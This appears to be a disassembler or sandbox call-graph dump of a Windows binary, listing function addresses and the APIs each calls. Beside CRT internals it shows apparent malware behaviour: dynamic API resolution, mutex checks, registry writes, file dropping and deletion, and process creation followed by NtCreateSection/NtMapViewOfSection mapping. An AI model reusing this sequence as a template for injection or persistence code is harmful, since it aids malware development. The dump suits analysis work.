20489 429db9 IsValidCodePage 20486->20489 20492 429dde _memset __setmbcp_nolock 20486->20492 20488 4290cf __atodbl_l 5 API calls 20487->20488 20490 429f31 20488->20490 20489->20487 20491 429dcb GetCPInfo 20489->20491 20490->20459 20490->20460 20491->20487 20491->20492 20497 429a9a GetCPInfo 20492->20497 20558 42d71c LeaveCriticalSection 20494->20558 20496 42a09c 20496->20456 20499 429ace _memset 20497->20499 20506 429b82 20497->20506 20507 42de56 20499->20507 20501 4290cf __atodbl_l 5 API calls 20503 429c28 20501->20503 20503->20492 20505 42dd29 ___crtLCMapStringA 82 API calls 20505->20506 20506->20501 20508 4254a4 _LocaleUpdate::_LocaleUpdate 76 API calls 20507->20508 20509 42de69 20508->20509 20517 42dd6f 20509->20517 20512 42dd29 20513 4254a4 _LocaleUpdate::_LocaleUpdate 76 API calls 20512->20513 20514 42dd3c 20513->20514 20534 42db42 20514->20534 20518 42dd98 MultiByteToWideChar 20517->20518 20519 42dd8d 20517->20519 20520 42ddc1 20518->20520 20522 42ddc5 20518->20522 20519->20518 20521 4290cf __atodbl_l 5 API calls 20520->20521 20523 429b3d 20521->20523 20525 42ddda _memset __crtLCMapStringA_stat 20522->20525 20526 4256b9 _malloc 66 API calls 20522->20526 20523->20512 20524 42de13 MultiByteToWideChar 20527 42de3a 20524->20527 20528 42de29 GetStringTypeW 20524->20528 20525->20520 20525->20524 20526->20525 20530 42db22 20527->20530 20528->20527 20531 42db3f 20530->20531 20532 42db2e 20530->20532 20531->20520 20532->20531 20533 42574d _free 66 API calls 20532->20533 20533->20531 20536 42db60 MultiByteToWideChar 20534->20536 20538 42dbc5 20536->20538 20547 42dbbe 20536->20547 20537 4290cf __atodbl_l 5 API calls 20540 429b5d 20537->20540 20541 4256b9 _malloc 66 API calls 20538->20541 20546 42dbde __crtLCMapStringA_stat 20538->20546 20539 42dc12 MultiByteToWideChar 20542 42dd0a 20539->20542 20543 42dc2b LCMapStringW 20539->20543 20540->20505 20541->20546 20544 42db22 __freea 66 API calls 20542->20544 20543->20542 20545 42dc4a 20543->20545 20544->20547 20548 42dc54 20545->20548 20551 42dc7d 20545->20551 20546->20539 20546->20547 20547->20537 20548->20542 20549 42dc68 LCMapStringW 20548->20549 20549->20542 20550 42dccc LCMapStringW 20552 42dce2 WideCharToMultiByte 20550->20552 20553 42dd04 20550->20553 20554 42dc98 __crtLCMapStringA_stat 20551->20554 20555 4256b9 _malloc 66 API calls 20551->20555 20552->20553 20556 42db22 __freea 66 API calls 20553->20556 20554->20542 20554->20550 20555->20554 20556->20542 20558->20496 20560 4299b6 20559->20560 20561 4299bd 20559->20561 20560->20561 20565 4299db 20560->20565 20562 4283ae ___strgtold12_l 66 API calls 20561->20562 20563 4299c2 20562->20563 20564 42835c ___strgtold12_l 11 API calls 20563->20564 20566 4299cc 20564->20566 20565->20566 20567 4283ae ___strgtold12_l 66 API calls 20565->20567 20566->19707 20567->20563 20569 42d201 EncodePointer 20568->20569 20569->20569 20570 42d21b 20569->20570 20570->19721 20574 429826 20571->20574 20573 42986f 20573->19723 20575 429832 _doexit 20574->20575 20582 42a508 20575->20582 20581 429853 _doexit 20581->20573 20583 42d7f5 __lock 66 API calls 20582->20583 20584 429837 20583->20584 20585 42973f DecodePointer DecodePointer 20584->20585 20586 4297ee 20585->20586 20587 42976d 20585->20587 20596 42985c 20586->20596 20587->20586 20599 42d997 20587->20599 20589 4297d1 EncodePointer EncodePointer 20589->20586 20590 42977f 20590->20589 20591 4297a3 20590->20591 20606 42d2af 20590->20606 20591->20586 20593 42d2af __realloc_crt 70 API calls 20591->20593 20594 4297bf EncodePointer 20591->20594 20595 4297b9 20593->20595 20594->20589 20595->20586 20595->20594 20632 42a511 20596->20632 20600 42d9a2 20599->20600 20601 42d9b7 HeapSize 20599->20601 20602 4283ae ___strgtold12_l 66 API calls 20600->20602 20601->20590 20603 42d9a7 20602->20603 20604 42835c ___strgtold12_l 11 API calls 20603->20604 20605 42d9b2 20604->20605 20605->20590 20609 42d2b8 20606->20609 20608 42d2f7 20608->20591 20609->20608 20610 42d2d8 Sleep 20609->20610 20611 42f534 20609->20611 20610->20609 20612 42f54a 20611->20612 20613 42f53f 20611->20613 20615 42f552 20612->20615 20624 42f55f 20612->20624 20614 4256b9 _malloc 66 API calls 20613->20614 20616 42f547 20614->20616 20617 42574d _free 66 API calls 20615->20617 20616->20609 20631 42f55a _free 20617->20631 20618 42f597 20619 429888 _malloc DecodePointer 20618->20619 20621 42f59d 20619->20621 20620 42f567 HeapReAlloc 20620->20624 20620->20631 20622 4283ae ___strgtold12_l 66 API calls 20621->20622 20622->20631 20623 42f5c7 20626 4283ae ___strgtold12_l 66 API calls 20623->20626 20624->20618 20624->20620 20624->20623 20625 429888 _malloc DecodePointer 20624->20625 20628 42f5af 20624->20628 20625->20624 20627 42f5cc GetLastError 20626->20627 20627->20631 20629 4283ae ___strgtold12_l 66 API calls 20628->20629 20630 42f5b4 GetLastError 20629->20630 20630->20631 20631->20609 20635 42d71c LeaveCriticalSection 20632->20635 20634 429861 20634->20581 20635->20634 20641 419164 20636->20641 20644 401032 20636->20644 20637 419180 20640 4191e1 GetProcAddress 20637->20640 20637->20641 20643 4191a3 GetProcAddress 20637->20643 20638 419226 LoadLibraryW 20639 419241 20638->20639 20638->20644 20642 41931b LoadLibraryW 20639->20642 20650 419269 20639->20650 20640->20641 20646 4191d8 20640->20646 20641->20637 20641->20638 20642->20644 20651 419336 20642->20651 20643->20637 20643->20646 20644->19733 20644->19734 20645 4192d0 GetProcAddress 20645->20639 20645->20646 20646->20644 20647 419410 LoadLibraryW 20647->20644 20656 41942b 20647->20656 20648 41928f GetProcAddress 20648->20646 20648->20650 20649 4193c5 GetProcAddress 20649->20646 20649->20651 20650->20639 20650->20645 20650->20648 20651->20647 20655 41935e 20651->20655 20652 419505 LoadLibraryW 20652->20644 20664 419520 20652->20664 20653 419384 GetProcAddress 20653->20646 20653->20655 20654 4194ba GetProcAddress 20654->20646 20654->20656 20655->20649 20655->20651 20655->20653 20656->20652 20660 419453 20656->20660 20657 4195fa LoadLibraryW 20657->20644 20665 419615 20657->20665 20658 419479 GetProcAddress 20658->20646 20658->20660 20659 4195af GetProcAddress 20659->20646 20659->20664 20660->20654 20660->20656 20660->20658 20661 41956e GetProcAddress 20661->20644 20661->20664 20662 4196ef LoadLibraryW 20662->20644 20670 41970a 20662->20670 20663 4196a4 GetProcAddress 20663->20646 20663->20665 20664->20657 20664->20659 20664->20661 20665->20662 20668 41963d 20665->20668 20666 419663 GetProcAddress 20666->20646 20666->20668 20667 4197e4 LoadLibraryW 20667->20644 20675 4197ff 20667->20675 20668->20663 20668->20665 20668->20666 20669 419799 GetProcAddress 20669->20646 20669->20670 20670->20667 20673 419732 20670->20673 20671 419758 GetProcAddress 20671->20646 20671->20673 20672 4198d9 LoadLibraryW 20672->20644 20680 4198f4 20672->20680 20673->20669 20673->20670 20673->20671 20674 41988e GetProcAddress 20674->20646 20674->20675 20675->20672 20679 419827 20675->20679 20676 4199ce LoadLibraryW 20676->20644 20685 4199e9 20676->20685 20677 41984d GetProcAddress 20677->20646 20677->20679 20678 419983 GetProcAddress 20678->20646 20678->20680 20679->20674 20679->20675 20679->20677 20680->20676 20684 41991c 20680->20684 20681 419ac3 LoadLibraryW 20681->20644 20690 419ade 20681->20690 20682 419942 GetProcAddress 20682->20646 20682->20684 20683 419a78 GetProcAddress 20683->20646 20683->20685 20684->20678 20684->20680 20684->20682 20685->20681 20689 419a11 20685->20689 20686 419bb8 LoadLibraryW 20686->20644 20695 419bd3 20686->20695 20687 419a37 GetProcAddress 20687->20646 20687->20689 20688 419b6d GetProcAddress 20688->20646 20688->20690 20689->20683 20689->20685 20689->20687 20690->20686 20694 419b06 20690->20694 20691 419cad LoadLibraryW 20691->20644 20700 419cc8 20691->20700 20692 419b2c GetProcAddress 20692->20646 20692->20694 20693 419c62 GetProcAddress 20693->20646 20693->20695 20694->20688 20694->20690 20694->20692 20695->20691 20699 419bfb 20695->20699 20696 419da2 LoadLibraryW 20696->20644 20705 419dbd 20696->20705 20697 419c21 GetProcAddress 20697->20646 20697->20699 20698 419d57 GetProcAddress 20698->20646 20698->20700 20699->20693 20699->20695 20699->20697 20700->20696 20704 419cf0 20700->20704 20701 419d16 GetProcAddress 20701->20646 20701->20704 20702 419e97 LoadLibraryW 20702->20644 20712 419eb2 20702->20712 20703 419e4c GetProcAddress 20703->20646 20703->20705 20704->20698 20704->20700 20704->20701 20705->20702 20708 419de5 20705->20708 20706 419e0b GetProcAddress 20706->20646 20706->20708 20707 419f8c LoadLibraryW 20707->20644 20716 419fa7 20707->20716 20708->20703 20708->20705 20708->20706 20709 419f41 GetProcAddress 20709->20646 20709->20712 20710 419f00 GetProcAddress 20710->20644 20710->20712 20711 41a081 LoadLibraryW 20711->20644 20717 41a09c 20711->20717 20712->20707 20712->20709 20712->20710 20713 41a036 GetProcAddress 20713->20646 20713->20716 20714 419ff5 GetProcAddress 20714->20644 20714->20716 20715 41a128 GetProcAddress 20715->20646 20715->20717 20716->20711 20716->20713 20716->20714 20717->20644 20719 41a0c4 20717->20719 20718 41a0ea GetProcAddress 20718->20646 20718->20719 20719->20715 20719->20717 20719->20718 20721 401085 20720->20721 20722 40685a GetProcAddress 20720->20722 20725 41d2c0 GetModuleHandleW GetProcAddress 20721->20725 20723 406872 20722->20723 20724 406878 FreeLibrary 20722->20724 20723->20724 20724->20721 20726 40108a Wow64DisableWow64FsRedirection CreateMutexW 20725->20726 20727 41d2fc GetCurrentProcess 20725->20727 20726->19740 20727->20726 21017 4245f0 20728->21017 20731 4084e4 _memset 20732 408500 GetWindowsDirectoryW 20731->20732 20733 40851d _memset 20732->20733 20742 401101 20732->20742 20734 408539 GetSystemDirectoryW 20733->20734 20735 408556 _memset 20734->20735 20734->20742 20736 42466a __snwprintf 102 API calls 20735->20736 20737 408592 _memset 20736->20737 20738 42466a __snwprintf 102 API calls 20737->20738 20739 4085d1 _memset 20738->20739 20740 42466a __snwprintf 102 API calls 20739->20740 20741 408610 StrCmpIW 20740->20741 20741->20742 20742->19743 20742->19744 20744 41cbd2 GetModuleFileNameW 20743->20744 20751 41cbc8 20743->20751 20745 41cbf1 20744->20745 20752 41cbe7 20744->20752 20746 41cc10 OpenMutexW 20745->20746 20747 41cc0b 20745->20747 20749 41cc45 20746->20749 20746->20752 20748 41cfdb 20747->20748 20748->19744 20749->20752 21019 4041b0 20749->21019 20751->20752 20752->20751 21098 417c20 20752->21098 20753 41cc5d 20753->20752 21023 4145d0 GetModuleHandleW GetProcAddress GetProcAddress 20753->21023 20758 41cf84 20760 41cf94 20758->20760 20761 41cf8a CloseHandle 20758->20761 20759 41cf77 CloseHandle 20759->20758 20763 41cfba 20760->20763 20764 41cfae CloseHandle 20760->20764 20761->20760 20765 41cfc0 LocalFree 20763->20765 20766 41cfca 20763->20766 20764->20763 20765->20766 20766->20748 20767 41cfd3 ExitProcess 20766->20767 20768 41cc96 20768->20752 21051 404570 20768->21051 20773 41cce2 CreateMutexW 20773->20747 20774 41ccff 20773->20774 20775 41d590 2 API calls 20774->20775 20776 41cd10 20775->20776 21066 4088c0 20776->21066 20779 41cd24 CreateMutexW 20779->20747 20780 41cd41 20779->20780 20781 41d590 2 API calls 20780->20781 20782 41cd52 20781->20782 21073 4089c0 LocalAlloc 20782->21073 20785 41cd66 CreateMutexW 20785->20747 20786 41cd83 20785->20786 20787 41d590 2 API calls 20786->20787 20792 41cd94 20787->20792 20788 41cea5 WaitForSingleObject 20788->20751 20789 41ceb8 WaitForMultipleObjects SetEvent 20789->20751 20790 41cdef 20794 41ce04 20790->20794 21094 4069f0 20790->21094 20792->20790 20792->20794 21086 4081e0 20792->21086 20794->20788 20794->20789 20796 40cc0d lstrcmpiW 20795->20796 20797 40cc35 lstrcmpiW 20796->20797 20827 401191 20796->20827 20798 40cd16 lstrcmpiW 20797->20798 20797->20827 20799 40cd30 OpenMutexW 20798->20799 20800 40cdf5 lstrcmpiW 20798->20800 20801 40cd64 OpenMutexW 20799->20801 20802 40cd4b 20799->20802 20803 40cece lstrcmpiW 20800->20803 20804 40ce0f OpenMutexW 20800->20804 20808 40cd7f 20801->20808 20802->20801 20807 40cee4 20803->20807 20803->20827 20805 40ce43 OpenMutexW 20804->20805 20806 40ce2a 20804->20806 20811 40ce5e 20805->20811 20806->20805 20809 40cf27 Sleep 20807->20809 20810 40ceed OpenMutexW 20807->20810 20812 40cda1 OpenMutexW 20808->20812 20813 40cddb Sleep 20808->20813 20816 40cd8b 20808->20816 20809->20827 20814 40cf23 20810->20814 20815 40cf0f Sleep 20810->20815 20819 40ce80 OpenMutexW 20811->20819 20820 40ceba Sleep 20811->20820 20821 40ce6a 20811->20821 20817 40cdc3 Sleep 20812->20817 20818 40cdd7 20812->20818 20813->20827 20814->20809 20815->20807 20816->20808 20817->20808 20818->20813 20822 40cea2 Sleep 20819->20822 20823 40ceb6 20819->20823 20820->20827 20821->20811 20822->20811 20823->20820 20827->19747 20827->19748 20829 401331 20828->20829 20831 41d5d0 LocalFree 20828->20831 20829->19775 20831->20829 20833 40c5a1 GetModuleFileNameW 20832->20833 20835 401556 20832->20835 20834 40c5bf LoadLibraryW 20833->20834 20836 40c5bb 20833->20836 20834->20836 20837 40c5dd GetModuleFileNameW 20834->20837 20838 418640 20835->20838 20836->20835 20837->20836 20839 401567 20838->20839 20840 41864c CreateMutexW 20838->20840 20842 407fe0 20839->20842 20840->20839 20841 418669 20840->20841 20841->20839 20843 42466a __snwprintf 102 API calls 20842->20843 20844 408004 RegCreateKeyExW 20843->20844 20845 408034 RegCloseKey 20844->20845 20850 401578 20844->20850 20846 40804b _memset 20845->20846 20847 4080a0 104 API calls 20846->20847 20848 408057 20847->20848 20848->20850 22124 408150 20848->22124 20851 406bc0 20850->20851 20852 406bf9 _memset 20851->20852 20853 401589 20852->20853 22129 41d650 CreateFileW 20852->22129 20861 406ae0 20853->20861 20856 42466a __snwprintf 102 API calls 20857 406c5c RegOpenKeyExW 20856->20857 20857->20853 20858 406c83 RegSetValueExW 20857->20858 20858->20853 20859 406cab LocalFree 20858->20859 20859->20853 20862 406b05 _memset 20861->20862 20863 42466a __snwprintf 102 API calls 20862->20863 20866 40159a 20862->20866 20864 406b3f 20863->20864 20865 406b66 lstrlenW RegSetValueExW 20864->20865 20864->20866 20865->20866 20866->19793 20866->19794 20868 40ca79 20867->20868 20869 40ca81 LocalAlloc 20868->20869 20870 4015d2 20868->20870 20869->20870 20871 40ca9b 20869->20871 20870->19798 20983 40f470 20870->20983 20871->20870 20872 40cad2 CreateDirectoryW 20871->20872 20872->20870 20874 4246a0 20873->20874 20875 424688 20873->20875 20877 4246c4 20874->20877 20879 4246af 20874->20879 20876 4283ae ___strgtold12_l 66 API calls 20875->20876 20878 42468d 20876->20878 22138 42760a 20877->22138 20880 42835c ___strgtold12_l 11 API calls 20878->20880 20881 4283ae ___strgtold12_l 66 API calls 20879->20881 20886 401709 20880->20886 20883 4246b4 20881->20883 20885 42835c ___strgtold12_l 11 API calls 20883->20885 20885->20886 20886->19811 20887 424705 20887->20886 20889 427410 __flsbuf 97 API calls 20887->20889 20888 427410 __flsbuf 97 API calls 20888->20887 20889->20886 20891 410d5f Wow64DisableWow64FsRedirection 20890->20891 20892 410d8b _memset 20891->20892 20893 410dc5 CreateProcessW 20892->20893 20894 4115e4 Wow64DisableWow64FsRedirection 20893->20894 20895 410e19 NtCreateSection 20893->20895 20898 4115f3 20894->20898 20896 410ea4 GetCurrentProcess NtMapViewOfSection 20895->20896 20897 4115ca CloseHandle CloseHandle 20895->20897 20899 410ef9 NtMapViewOfSection 20896->20899 20915 41151a 20896->20915 20897->20894 20898->19823 20900 410f44 NtCreateSection 20899->20900 20899->20915 20901 410f9f GetCurrentProcess NtMapViewOfSection 20900->20901 20900->20915 20902 410ff6 NtMapViewOfSection 20901->20902 20901->20915 20902->20915 20915->20897 20920 401218 20919->20920 20920->19753 20920->19769 20922 401c98 _memset 20921->20922 20923 41d2c0 3 API calls 20922->20923 20934 401f57 20922->20934 20924 401d02 20923->20924 20925 401d07 20924->20925 20926 401d29 20924->20926 20927 42466a __snwprintf 102 API calls 20925->20927 20928 42466a __snwprintf 102 API calls 20926->20928 20929 401d24 _memset 20927->20929 20928->20929 20930 401dac GetModuleHandleW 20929->20930 20929->20934 20931 401dcf 11 API calls 20930->20931 20933 406db0 2 API calls 20931->20933 20933->20934 20934->19778 20937 41405f _wcscat 20935->20937 20936 41446a 20936->19774 20937->20936 20938 4140df 20937->20938 20939 41412e 20937->20939 20940 42466a __snwprintf 102 API calls 20938->20940 20941 414147 20939->20941 20942 4141ec 20939->20942 20954 414109 _wcscat 20940->20954 20949 42466a __snwprintf 102 API calls 20941->20949 20941->20954 20943 41427e 20942->20943 20945 414201 20942->20945 20944 414310 20943->20944 20946 414293 20943->20946 20950 4143d8 20944->20950 20952 414329 20944->20952 20947 42466a __snwprintf 102 API calls 20945->20947 20945->20954 20948 42466a __snwprintf 102 API calls 20946->20948 20946->20954 20947->20954 20948->20954 20949->20954 20951 42466a __snwprintf 102 API calls 20950->20951 20950->20954 20951->20954 20953 42466a __snwprintf 102 API calls 20952->20953 20952->20954 20953->20954 20954->19774 20956 4144a6 20955->20956 20957 418a30 5 API calls 20956->20957 20960 414522 _memset 20956->20960 20958 414506 20957->20958 20959 42466a __snwprintf 102 API calls 20958->20959 20959->20960 20960->19780 20962 40c986 20961->20962 20963 40c9d2 lstrlenW lstrlenW 20962->20963 20964 40ca4b 20962->20964 20965 40ca08 20963->20965 20964->19799 20965->20964 20966 42466a __snwprintf 102 API calls 20965->20966 20967 40ca2f lstrlenW 20966->20967 20967->20964 20969 40c970 105 API calls 20968->20969 20970 40c63d 20969->20970 20971 40c64d CreateDirectoryW 20970->20971 20980 4015b9 20970->20980 20972 40c65e 20971->20972 20973 40c689 wsprintfW GetModuleFileNameW 20972->20973 20972->20980 20974 40c6d8 20973->20974 20973->20980 20975 41d650 7 API calls 20974->20975 20976 40c6eb 20975->20976 20977 40c701 CreateFileW 20976->20977 20976->20980 20978 40c733 20977->20978 20979 40c75c WriteFile 20978->20979 20978->20980 20979->20980 20982 40c7e3 DeleteFileW 20979->20982 20980->19793 20982->20980 20984 40c970 105 API calls 20983->20984 20985 40f484 20984->20985 20986 42466a __snwprintf 102 API calls 20985->20986 20991 40f558 _memset 20985->20991 20987 40f4d1 20986->20987 20988 40f507 lstrcmpiW 20987->20988 20987->20991 20989 40f51d 20988->20989 20988->20991 20990 42466a __snwprintf 102 API calls 20989->20990 20989->20991 20990->20991 20991->19798 20993 401633 20992->20993 20994 41de1c 20992->20994 20993->19805 20993->19806 20995 41de31 LocalAlloc 20994->20995 20996 41de7a LocalFree 20994->20996 20995->20996 20997 41de46 20995->20997 20996->20993 20997->20993 20998 41de70 LocalFree 20997->20998 20998->20996 21000 40d7fd __write_nolock 20999->21000 22238 40f3d0 21000->22238 21003 40d81d lstrcpyW 21004 40d83f 21003->21004 21005 40d8c2 7 API calls 21004->21005 21014 40e0b2 21004->21014 21006 40d964 21005->21006 21005->21014 21006->21014 21014->19815 21018 4084c5 GetModuleFileNameW 21017->21018 21018->20731 21018->20742 21020 4041bc 21019->21020 21021 4041c5 21020->21021 21022 404207 CreateThread 21020->21022 21021->20753 21022->21021 21129 4042e0 21022->21129 21024 414610 21023->21024 21024->20752 21025 4179e0 lstrlenW 21024->21025 21026 4179f8 CreateEventW 21025->21026 21033 417a37 21025->21033 21027 417a14 CreateThread 21026->21027 21026->21033 21029 417a3b LocalFree 21027->21029 21027->21033 21726 408670 21027->21726 21028 417b2d 21031 417b3b 21028->21031 21363 40ee20 21028->21363 21029->21033 21034 417b49 21031->21034 21378 41bcb0 CreateThread 21031->21378 21035 40c970 105 API calls 21033->21035 21050 417b0f 21033->21050 21380 416a30 21034->21380 21041 417a91 _memset 21035->21041 21039 417b5c CreateEventW 21040 417b78 CreateThread 21039->21040 21044 417b9b 21039->21044 21042 417b9d CloseHandle 21040->21042 21040->21044 21701 40bca0 21040->21701 21045 42466a __snwprintf 102 API calls 21041->21045 21041->21050 21042->21044 21043 417c03 21043->20768 21044->21043 21046 417be0 CreateThread 21044->21046 21047 417bc6 CreateThread 21044->21047 21048 417ae4 21045->21048 21046->21043 21731 422100 OpenEventW 21046->21731 21047->21046 21782 41c690 CreateEventW 21047->21782 21298 407280 21048->21298 21050->21028 21360 40f0b0 21050->21360 21052 404583 21051->21052 21055 40457c 21051->21055 22112 4046c0 21052->22112 21055->20752 21059 4087c0 21055->21059 21058 4046c0 102 API calls 21058->21055 21060 4087d3 21059->21060 21061 408829 GetWindowsDirectoryW 21060->21061 21065 408868 21060->21065 21062 40883c 21061->21062 21061->21065 21063 42466a __snwprintf 102 API calls 21062->21063 21064 408853 lstrcmpiW 21063->21064 21064->21065 21065->20773 21065->20774 21068 4088d3 21066->21068 21067 408968 21067->20779 21067->20780 21068->21067 21069 408929 GetSystemDirectoryW 21068->21069 21069->21067 21070 40893c 21069->21070 21071 42466a __snwprintf 102 API calls 21070->21071 21072 408953 lstrcmpiW 21071->21072 21072->21067 21074 4089e0 LocalAlloc 21073->21074 21075 408aab 21073->21075 21076 408aa1 LocalFree 21074->21076 21077 4089fa LocalAlloc 21074->21077 21075->20785 21075->20786 21076->21075 21078 408a14 GetModuleFileNameW 21077->21078 21079 408a97 LocalFree 21077->21079 21080 408a29 GetSystemDirectoryW 21078->21080 21081 408a8d LocalFree 21078->21081 21079->21076 21080->21081 21082 408a3c 21080->21082 21081->21079 21083 42466a __snwprintf 102 API calls 21082->21083 21084 408a53 lstrcmpiW 21083->21084 21084->21081 21085 408a68 LocalFree LocalFree LocalFree 21084->21085 21085->21075 21087 408205 _memset 21086->21087 21088 40c970 105 API calls 21087->21088 21089 408238 21088->21089 21090 42466a __snwprintf 102 API calls 21089->21090 21093 408290 21089->21093 21091 40826b 21090->21091 21092 42466a __snwprintf 102 API calls 21091->21092 21092->21093 21093->20792 21095 406a0d _memset 21094->21095 21096 42466a __snwprintf 102 API calls 21095->21096 21097 406a54 21095->21097 21096->21097 21097->20794 21099 417c42 21098->21099 21100 417c36 SetEvent 21098->21100 21101 417c4b WaitForSingleObject 21099->21101 21102 417c5a 21099->21102 21100->21099 21101->21102 21103 417c70 21102->21103 21104 417c63 CloseHandle 21102->21104 21105 417c85 21103->21105 21106 417c79 SetEvent 21103->21106 21104->21103 21107 417c9d 21105->21107 21108 417c8e WaitForSingleObject 21105->21108 21106->21105 21109 417cb3 21107->21109 21110 417ca6 CloseHandle 21107->21110 21108->21107 21111 417cc8 21109->21111 21112 417cbc CloseHandle 21109->21112 21110->21109 21113 417cd1 SetEvent 21111->21113 21114 417cde 21111->21114 21112->21111 21113->21114 21115 417ce7 WaitForSingleObject 21114->21115 21116 417cf6 21114->21116 21115->21116 21117 417d0b 21116->21117 21118 417cff CloseHandle 21116->21118 21119 417d21 21117->21119 21120 417d14 SetEvent 21117->21120 21118->21117 21121 417d39 21119->21121 21122 417d2a WaitForSingleObject 21119->21122 21120->21119 21123 417d42 CloseHandle 21121->21123 21124 417d4e 21121->21124 21122->21121 21123->21124 21125 417d64 21124->21125 21126 417d57 CloseHandle 21124->21126 22119 41bcf0 21125->22119 21126->21125 21130 4042e6 21129->21130 21133 404352 21130->21133 21134 408310 21130->21134 21143 4134d0 21130->21143 21135 40c970 105 API calls 21134->21135 21136 40832b 21135->21136 21137 40834c GetLastError 21136->21137 21138 40835d 21136->21138 21142 4083db 21136->21142 21137->21138 21137->21142 21139 42466a __snwprintf 102 API calls 21138->21139 21138->21142 21140 408393 21139->21140 21140->21142 21171 406cf0 21140->21171 21142->21130 21144 4134dd __write_nolock 21143->21144 21147 413575 21144->21147 21174 418a30 21144->21174 21148 41368e 21147->21148 21182 418da0 21147->21182 21190 40fcb0 21148->21190 21152 4137cd 21205 40f950 21152->21205 21154 4137d2 21210 40f600 21154->21210 21158 40c970 105 API calls 21160 4138fc _memset 21158->21160 21159 413c8a 21159->21130 21160->21159 21162 42466a __snwprintf 102 API calls 21160->21162 21161 413804 _memset 21161->21158 21163 413953 _memset 21162->21163 21163->21159 21164 4139b7 21163->21164 21165 4139db 21163->21165 21166 42466a __snwprintf 102 API calls 21164->21166 21167 42466a __snwprintf 102 API calls 21165->21167 21168 4139d6 _memset 21166->21168 21167->21168 21168->21159 21169 413b54 9 API calls 21168->21169 21242 406db0 21169->21242 21172 42466a __snwprintf 102 API calls 21171->21172 21173 406d18 21172->21173 21173->21142 21175 418af2 21174->21175 21176 418a48 21174->21176 21179 418b51 LocalAlloc 21175->21179 21181 418a6a _memset _memmove 21175->21181 21177 418a9a lstrlenW LocalAlloc 21176->21177 21178 418a4e lstrlenW 21176->21178 21180 418ad5 lstrcpyW 21177->21180 21177->21181 21178->21181 21179->21181 21180->21181 21181->21144 21183 418e60 21182->21183 21184 418db8 21182->21184 21187 418eb8 LocalAlloc 21183->21187 21189 418dda _memset _memmove 21183->21189 21185 418e09 lstrlenA LocalAlloc 21184->21185 21186 418dbe lstrlenA 21184->21186 21188 418e43 lstrcpyA 21185->21188 21185->21189 21186->21189 21187->21189 21188->21189 21189->21147 21191 40fcc3 21190->21191 21195 40fdd9 21190->21195 21192 42466a __snwprintf 102 API calls 21191->21192 21194 40fd23 21191->21194 21193 40fd0c DeleteFileW 21192->21193 21193->21194 21194->21195 21196 42466a __snwprintf 102 API calls 21194->21196 21200 40fa70 21195->21200 21197 40fd7e 21196->21197 21197->21195 21198 42466a __snwprintf 102 API calls 21197->21198 21199 40fdb8 DeleteFileW RemoveDirectoryW 21198->21199 21199->21195 21201 40fa95 21200->21201 21202 42466a __snwprintf 102 API calls 21201->21202 21204 40fbbf _memset 21201->21204 21203 40fb74 lstrlenW 21202->21203 21203->21204 21204->21152 21206 40f969 21205->21206 21207 42466a __snwprintf 102 API calls 21206->21207 21209 40f9ec _memset 21206->21209 21208 40f9b6 lstrlenW 21207->21208 21208->21209 21209->21154 21211 40f636 21210->21211 21212 40f65c CoCreateInstance 21211->21212 21230 40f63f 21211->21230 21213 40f685 21212->21213 21212->21230 21248 413fa0 VariantInit 21213->21248 21215 40f68d 21249 413fa0 VariantInit 21215->21249 21217 40f6cb 21250 413fa0 VariantInit 21217->21250 21219 40f706 21251 413fa0 VariantInit 21219->21251 21221 40f744 21252 414010 VariantClear 21221->21252 21223 40f819 21253 414010 VariantClear 21223->21253 21225 40f825 21254 414010 VariantClear 21225->21254 21227 40f831 21255 414010 VariantClear 21227->21255 21229 40f840 21229->21230 21256 413d40 21229->21256 21238 40cb60 21230->21238 21232 40f85f 21261 413dd0 21232->21261 21235 413d40 78 API calls 21236 40f8c0 21235->21236 21239 40cb79 21238->21239 21240 40cbd5 21239->21240 21241 40cbbc lstrlenW 21239->21241 21240->21161 21241->21240 21243 406dbf _memset 21242->21243 21244 406e64 GetCurrentProcess 21243->21244 21247 406f74 _memset _memmove 21243->21247 21245 406e96 _memmove 21244->21245 21246 406f33 GetCurrentProcess 21245->21246 21245->21247 21246->21247 21247->21159 21248->21215 21249->21217 21250->21219 21251->21221 21252->21223 21253->21225 21254->21227 21255->21229 21264 413f20 21256->21264 21260 413d84 21260->21232 21287 413e20 21261->21287 21269 425298 21264->21269 21267 413e50 SysAllocString 21268 413e82 21267->21268 21268->21260 21271 4252a2 21269->21271 21270 4256b9 _malloc 66 API calls 21270->21271 21271->21270 21272 413d65 21271->21272 21273 429888 _malloc DecodePointer 21271->21273 21276 4252be std::exception::exception 21271->21276 21272->21260 21272->21267 21273->21271 21274 4252fc 21281 42547f 21274->21281 21276->21274 21278 429862 __cinit 76 API calls 21276->21278 21278->21274 21280 425317 21282 425418 std::exception::operator= 66 API calls 21281->21282 21283 425306 21282->21283 21284 42524c 21283->21284 21285 425281 RaiseException 21284->21285 21286 425275 21284->21286 21285->21280 21286->21285 21288 413e2f 21287->21288 21290 40f8a7 21287->21290 21291 413ea0 InterlockedDecrement 21288->21291 21290->21230 21290->21235 21292 413ebf 21291->21292 21294 413edb 21291->21294 21292->21294 21294->21290 21299 4072c4 _memset 21298->21299 21300 418a30 5 API calls 21299->21300 21301 4072e6 _memset 21300->21301 21302 418a30 5 API calls 21301->21302 21303 407332 21302->21303 21304 40739c CoCreateInstance 21303->21304 21322 407369 21303->21322 21305 4073cb 21304->21305 21304->21322 21401 413fa0 VariantInit 21305->21401 21307 4073d6 21402 413fa0 VariantInit 21307->21402 21309 407423 21403 413fa0 VariantInit 21309->21403 21311 40746d 21404 413fa0 VariantInit 21311->21404 21313 4074b7 21405 414010 VariantClear 21313->21405 21315 4075bf 21406 414010 VariantClear 21315->21406 21317 4075ce 21407 414010 VariantClear 21317->21407 21319 4075dd 21408 414010 VariantClear 21319->21408 21321 4075ef 21321->21322 21323 413d40 78 API calls 21321->21323 21322->21050 21324 407614 21323->21324 21325 413dd0 2 API calls 21324->21325 21326 407665 21325->21326 21326->21322 21327 413d40 78 API calls 21326->21327 21328 407684 21327->21328 21329 413dd0 2 API calls 21328->21329 21330 4076cf 21329->21330 21330->21322 21331 413d40 78 API calls 21330->21331 21332 4077fd 21331->21332 21333 413dd0 2 API calls 21332->21333 21334 407848 _memset 21333->21334 21334->21322 21335 413d40 78 API calls 21334->21335 21336 4079b2 21335->21336 21361 40c970 105 API calls 21360->21361 21362 40f0c4 21361->21362 21362->21028 21364 40ee33 21363->21364 21365 42466a __snwprintf 102 API calls 21364->21365 21377 40efe5 21364->21377 21366 40ee77 21365->21366 21367 40c970 105 API calls 21366->21367 21368 40ee88 21367->21368 21368->21377 21415 42584b 21368->21415 21371 42466a __snwprintf 102 API calls 21372 40ef2a 